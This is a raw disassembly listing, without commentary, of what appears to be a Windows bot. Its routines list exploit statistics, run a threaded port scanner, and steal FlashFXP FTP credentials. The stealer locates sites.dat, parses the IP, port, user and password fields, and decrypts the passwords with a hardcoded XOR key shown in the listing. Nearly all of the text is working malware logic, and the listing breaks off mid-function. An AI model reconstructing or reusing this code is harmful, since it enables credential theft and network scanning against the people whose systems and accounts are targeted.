call sub_416B40 ; strlen
pop ecx
lea eax, [ebp+eax+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
movsx eax, [ebp+var_225]
test eax, eax
jz short loc_41414A
mov eax, [ebp+var_204]
imul eax, 3Ah
and dword_41CCFA[eax], 0
loc_41414A: ; CODE XREF: sub_414052+E6�j
jmp loc_414097
; ---------------------------------------------------------------------------
loc_41414F: ; CODE XREF: sub_414052+64�j
and [ebp+var_224], 0
lea eax, [ebp+var_200]
push eax
lea eax, [ebp+var_3BC]
push eax
call sub_40D53F
pop ecx
pop ecx
push [ebp+var_3C0]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_414052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417D proc near ; CODE XREF: sub_40A9CF+BF4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414197
jmp short locret_4141BF
; ---------------------------------------------------------------------------
loc_414197: ; CODE XREF: sub_41417D+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push [ebp+var_4]
push offset sub_414052
call sub_4095A4
add esp, 10h
locret_4141BF: ; CODE XREF: sub_41417D+18�j
leave
retn
sub_41417D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141C1 proc near ; DATA XREF: sub_4142BF+E2�o
var_2BC = dword ptr -2BCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1B2 = dword ptr -1B2h
var_1AE = byte ptr -1AEh
var_16 = byte ptr -16h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2BCh
push 2B1h
push [ebp+arg_0]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push [ebp+var_1B2]
push 0
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41424F
push [ebp+var_8]
call sub_4053B1
pop ecx
call sub_416B64 ; clock
sub eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D050
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41424F: ; CODE XREF: sub_4141C1+56�j
movsx eax, [ebp+var_16]
test eax, eax
jnz short loc_4142AD
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, [ebp+var_1B2]
jb short loc_41428B
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D018
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41428B: ; CODE XREF: sub_4141C1+A4�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41CFE8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
loc_4142AD: ; CODE XREF: sub_4141C1+8C�j
; sub_4141C1+94�j ...
push [ebp+var_2BC]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_4141C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BF proc near ; CODE XREF: sub_40A9CF+1B5E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_4142D0
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142D0: ; CODE XREF: sub_4142BF+A�j
cmp [ebp+arg_8], 0
jnz short loc_4142DD
mov [ebp+arg_8], offset a80 ; "80"
loc_4142DD: ; CODE XREF: sub_4142BF+15�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4142F8
cmp [ebp+var_8], 0FFFFh
jbe short loc_4142FD
loc_4142F8: ; CODE XREF: sub_4142BF+2E�j
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142FD: ; CODE XREF: sub_4142BF+37�j
cmp [ebp+arg_C], 0
jz short loc_414311
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_414318
; ---------------------------------------------------------------------------
loc_414311: ; CODE XREF: sub_4142BF+42�j
mov [ebp+var_10], 0EA60h
loc_414318: ; CODE XREF: sub_4142BF+50�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41432D
cmp [ebp+var_4], 36EE80h
jbe short loc_41432F
loc_41432D: ; CODE XREF: sub_4142BF+63�j
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_41432F: ; CODE XREF: sub_4142BF+6C�j
push 2B1h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_414345
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_414345: ; CODE XREF: sub_4142BF+82�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_C]
add eax, 104h
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10Ah], ecx
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 10Eh
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41D080
push 0
push [ebp+var_C]
push offset sub_4141C1
call sub_4095A4
add esp, 18h
locret_4143AE: ; CODE XREF: sub_4142BF+C�j
; sub_4142BF:loc_4142F8�j ...
leave
retn
sub_4142BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143B0 proc near ; DATA XREF: sub_414600+1D6�o
var_2E8 = qword ptr -2E8h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = byte ptr -2BCh
var_1BC = word ptr -1BCh
var_1BA = word ptr -1BAh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_18 = byte ptr -18h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2DCh
push 2B3h
push [ebp+arg_0]
lea eax, [ebp+var_2C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov ax, [ebp+var_1BC]
mov [ebp+var_C], ax
push [ebp+var_1B4]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41440C
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4145FC
; ---------------------------------------------------------------------------
loc_41440C: ; CODE XREF: sub_4143B0+47�j
push [ebp+var_1B4]
movzx eax, [ebp+var_1BA]
push eax
movzx eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_2BC]
push eax
mov eax, [ebp+var_2C0]
push dword ptr [eax]
push offset dword_41D0F0
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_414458
push 3E8h
call ds:dword_41709C ; Sleep
loc_414458: ; CODE XREF: sub_4143B0+9B�j
call sub_416B64 ; clock
mov [ebp+var_2C4], eax
and [ebp+var_4], 0
loc_414467: ; CODE XREF: sub_4143B0+13A�j
; sub_4143B0+1F0�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jnz short loc_414482
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jle short loc_414487
loc_414482: ; CODE XREF: sub_4143B0+C1�j
jmp loc_4145A5
; ---------------------------------------------------------------------------
loc_414487: ; CODE XREF: sub_4143B0+D0�j
push 0Ah
lea eax, [ebp+var_2CC]
push eax
movzx eax, [ebp+var_C]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+var_8]
push 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_2D0], eax
mov ax, [ebp+var_C]
add ax, 1
mov [ebp+var_C], ax
cmp [ebp+var_2D0], 0
jz short loc_4144EF
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jg short loc_4144EF
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4144EF: ; CODE XREF: sub_4143B0+129�j
; sub_4143B0+138�j
push [ebp+var_1B8]
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_414597
loc_41450C: ; CODE XREF: sub_4143B0+1E2�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jz short loc_41451A
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_41451A: ; CODE XREF: sub_4143B0+166�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_2D8], eax
cmp [ebp+var_2D8], 0
jnz short loc_414534
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: sub_4143B0+180�j
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2D8]
call sub_4045B2
pop ecx
pop ecx
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov al, [ebp+var_18]
mov [ebp+var_2D4], al
and [ebp+var_18], 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
push offset dword_41D0DC
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_2D4]
mov [ebp+var_18], al
push 3E8h
call ds:dword_41709C ; Sleep
jmp loc_41450C
; ---------------------------------------------------------------------------
loc_414597: ; CODE XREF: sub_4143B0+156�j
; sub_4143B0+168�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: sub_4143B0:loc_414482�j
push [ebp+var_4]
call sub_416B64 ; clock
sub eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
fild [ebp+var_2DC]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+2E8h+var_2E8]
lea eax, [ebp+var_2BC]
push eax
push offset unk_41D0A0
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 18h
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
locret_4145FC: ; CODE XREF: sub_4143B0+57�j
leave
retn 4
sub_4143B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414600 proc near ; CODE XREF: sub_40A9CF+C9C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 0
jz short loc_414612
cmp [ebp+arg_8], 0
jnz short loc_414617
loc_414612: ; CODE XREF: sub_414600+A�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414617: ; CODE XREF: sub_414600+10�j
cmp [ebp+arg_C], 0
jnz short loc_414623
mov eax, [ebp+arg_8]
mov [ebp+arg_C], eax
loc_414623: ; CODE XREF: sub_414600+1B�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41463E
cmp [ebp+var_8], 0FFFFh
jbe short loc_414643
loc_41463E: ; CODE XREF: sub_414600+33�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414643: ; CODE XREF: sub_414600+3C�j
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41465E
cmp [ebp+var_14], 0FFFFh
jbe short loc_414663
loc_41465E: ; CODE XREF: sub_414600+53�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414663: ; CODE XREF: sub_414600+5C�j
push 2B3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41467C
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_41467C: ; CODE XREF: sub_414600+75�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jbe short loc_414696
mov eax, [ebp+var_14]
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
loc_414696: ; CODE XREF: sub_414600+82�j
cmp [ebp+arg_10], 0
jz short loc_4146AA
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4146B1
; ---------------------------------------------------------------------------
loc_4146AA: ; CODE XREF: sub_414600+9A�j
mov [ebp+var_1C], 7D0h
loc_4146B1: ; CODE XREF: sub_414600+A8�j
mov eax, [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4146C6
cmp [ebp+var_C], 0EA60h
jbe short loc_4146CD
loc_4146C6: ; CODE XREF: sub_414600+BB�j
mov [ebp+var_C], 7D0h
loc_4146CD: ; CODE XREF: sub_414600+C4�j
cmp [ebp+arg_14], 0
jz short loc_4146E1
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_20], eax
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146E1: ; CODE XREF: sub_414600+D1�j
mov [ebp+var_20], 100h
loc_4146E8: ; CODE XREF: sub_414600+DF�j
mov eax, [ebp+var_20]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4146FD
cmp [ebp+var_10], 200h
jbe short loc_414704
loc_4146FD: ; CODE XREF: sub_414600+F2�j
mov [ebp+var_10], 100h
loc_414704: ; CODE XREF: sub_414600+FB�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_8]
mov [eax+104h], cx
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_14]
mov [eax+106h], cx
cmp [ebp+var_C], 0EA60h
jbe short loc_414749
mov [ebp+var_24], 0EA60h
jmp short loc_41474F
; ---------------------------------------------------------------------------
loc_414749: ; CODE XREF: sub_414600+13E�j
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
loc_41474F: ; CODE XREF: sub_414600+147�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_24]
mov [eax+108h], ecx
cmp [ebp+var_10], 200h
jbe short loc_41476D
mov [ebp+var_28], 200h
jmp short loc_414773
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414600+162�j
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
loc_414773: ; CODE XREF: sub_414600+16B�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
mov [eax+10Ch], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 110h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+10Ch]
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+106h]
push eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+104h]
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
push offset dword_41D138
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_4143B0
call sub_4095A4
add esp, 20h
locret_4147E3: ; CODE XREF: sub_414600:loc_414612�j
; sub_414600:loc_41463E�j ...
leave
retn
sub_414600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147E5 proc near ; CODE XREF: sub_414A1E+373�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414816
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_4147E5+28�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
loc_41481E: ; CODE XREF: sub_4147E5:loc_4148BE�j
lea eax, [ebp+var_C]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414842
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414842: ; CODE XREF: sub_4147E5+54�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
xor ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
cmp eax, [ebp+var_C]
jl short loc_414866
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
loc_414866: ; CODE XREF: sub_4147E5+78�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414899
xor eax, eax
jmp short locret_4148CC
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_4147E5+AE�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148B2
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_4148B2: ; CODE XREF: sub_4147E5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148BE
jmp short loc_4148C3
; ---------------------------------------------------------------------------
loc_4148BE: ; CODE XREF: sub_4147E5+D5�j
jmp loc_41481E
; ---------------------------------------------------------------------------
loc_4148C3: ; CODE XREF: sub_4147E5+D7�j
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
push 1
pop eax
locret_4148CC: ; CODE XREF: sub_4147E5+2C�j
; sub_4147E5+58�j ...
leave
retn
sub_4147E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148CE proc near ; CODE XREF: sub_414A1E+30�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push 20019h
push 0
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
mov [ebp+var_10], eax
mov [ebp+var_4], 104h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push 0
push 0
push 0
push [ebp+var_14]
call ds:dword_41700C ; RegQueryValueExA
mov [ebp+var_10], eax
push [ebp+var_14]
call ds:dword_417028 ; RegCloseKey
cmp [ebp+var_10], 0
jnz short loc_414971
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_414945
jmp loc_414A17
; ---------------------------------------------------------------------------
loc_414945: ; CODE XREF: sub_4148CE+70�j
push offset aSites_dat ; "sites.dat"
push [ebp+var_18]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_18]
add eax, 0Fh
push eax
mov eax, [ebp+var_18]
add eax, 9
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1
pop eax
jmp locret_414A1C
; ---------------------------------------------------------------------------
loc_414971: ; CODE XREF: sub_4148CE+55�j
; sub_4148CE:loc_414A17�j
push 104h
push [ebp+arg_0]
push offset aProgramfiles ; "ProgramFiles"
call ds:dword_417104 ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4149B0
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_4149B0: ; CODE XREF: sub_4148CE+DB�j
mov eax, dword_419398
mov [ebp+var_C], eax
loc_4149B8: ; CODE XREF: sub_4148CE+143�j
lea eax, [ebp+var_C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 5
jz short loc_414A02
cmp [ebp+var_1C], 2
jz short loc_414A02
lea eax, [ebp+var_C]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 0Ch
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414A02
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A02: ; CODE XREF: sub_4148CE+FB�j
; sub_4148CE+101�j ...
mov al, byte ptr [ebp+var_C]
add al, 1
mov byte ptr [ebp+var_C], al
movsx eax, byte ptr [ebp+var_C]
cmp eax, 5Ah
jnz short loc_4149B8
xor eax, eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A17: ; CODE XREF: sub_4148CE+72�j
jmp loc_414971
; ---------------------------------------------------------------------------
locret_414A1C: ; CODE XREF: sub_4148CE+9E�j
; sub_4148CE+E0�j ...
leave
retn
sub_4148CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A1E proc near ; DATA XREF: sub_414EB0+35�o
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = byte ptr -5C4h
var_544 = byte ptr -544h
var_4C4 = byte ptr -4C4h
var_444 = byte ptr -444h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = byte ptr -3B4h
var_334 = dword ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_190 = byte ptr -190h
var_184 = dword ptr -184h
var_180 = byte ptr -180h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5E0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_180]
push eax
call sub_4148CE
pop ecx
test eax, eax
jnz short loc_414A6B
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp locret_414EAC
; ---------------------------------------------------------------------------
loc_414A6B: ; CODE XREF: sub_414A1E+38�j
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D308
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_184], 0
and [ebp+var_334], 0
mov al, [ebp+var_190]
mov [ebp+var_330], al
and [ebp+var_190], 0
push offset aRb ; "rb"
lea eax, [ebp+var_180]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0
jnz short loc_414ACF
jmp loc_414EAA
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: sub_414A1E+AA�j
push 2
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_3C4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_3C0], eax
cmp [ebp+var_3C0], 100000h
jnb short loc_414B0D
mov eax, [ebp+var_3C0]
mov [ebp+var_5E0], eax
jmp short loc_414B17
; ---------------------------------------------------------------------------
loc_414B0D: ; CODE XREF: sub_414A1E+DF�j
mov [ebp+var_5E0], 100000h
loc_414B17: ; CODE XREF: sub_414A1E+ED�j
mov eax, [ebp+var_5E0]
mov [ebp+var_3C0], eax
push 0
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
mov eax, [ebp+var_3C0]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_3BC], eax
cmp [ebp+var_3BC], 0
jnz short loc_414B63
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
jmp loc_414EA8
; ---------------------------------------------------------------------------
loc_414B63: ; CODE XREF: sub_414A1E+132�j
push [ebp+var_3C4]
push [ebp+var_3C0]
push 1
push [ebp+var_3BC]
call sub_416B90 ; fread
add esp, 10h
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_3BC]
add eax, [ebp+var_3C0]
and byte ptr [eax], 0
mov eax, [ebp+var_3BC]
mov [ebp+var_3B8], eax
loc_414BA6: ; CODE XREF: sub_414A1E+428�j
push offset asc_41D300 ; "\r\n\r\n["
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5DC], eax
mov eax, [ebp+var_3B8]
mov [ebp+var_5D0], eax
push offset aIp ; "\r\nIP="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5C8], eax
push offset aPort ; "\r\nPort="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D8], eax
push offset aUser_0 ; "\r\nUser="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5CC], eax
push offset aPass_0 ; "\r\nPass="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D4], eax
cmp [ebp+var_5C8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C52
mov eax, [ebp+var_5C8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C52: ; CODE XREF: sub_414A1E+220�j
cmp [ebp+var_5D8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C7A
mov eax, [ebp+var_5D8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C7A: ; CODE XREF: sub_414A1E+248�j
cmp [ebp+var_5CC], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CA2
mov eax, [ebp+var_5CC]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CA2: ; CODE XREF: sub_414A1E+270�j
cmp [ebp+var_5D4], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CCA
mov eax, [ebp+var_5D4]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CCA: ; CODE XREF: sub_414A1E+298�j
and [ebp+var_4C4], 0
mov al, [ebp+var_4C4]
mov [ebp+var_3B4], al
mov al, [ebp+var_3B4]
mov [ebp+var_5C4], al
mov al, [ebp+var_5C4]
mov [ebp+var_444], al
mov al, [ebp+var_444]
mov [ebp+var_544], al
lea eax, [ebp+var_544]
push eax
push offset asc_41D2D4 ; "[%[^]]]\r\n"
push [ebp+var_5D0]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_444]
push eax
push offset aIp127s ; "\r\nIP=%127s\r\n"
push [ebp+var_5C8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_5C4]
push eax
push offset aPort127s ; "\r\nPort=%127s\r\n"
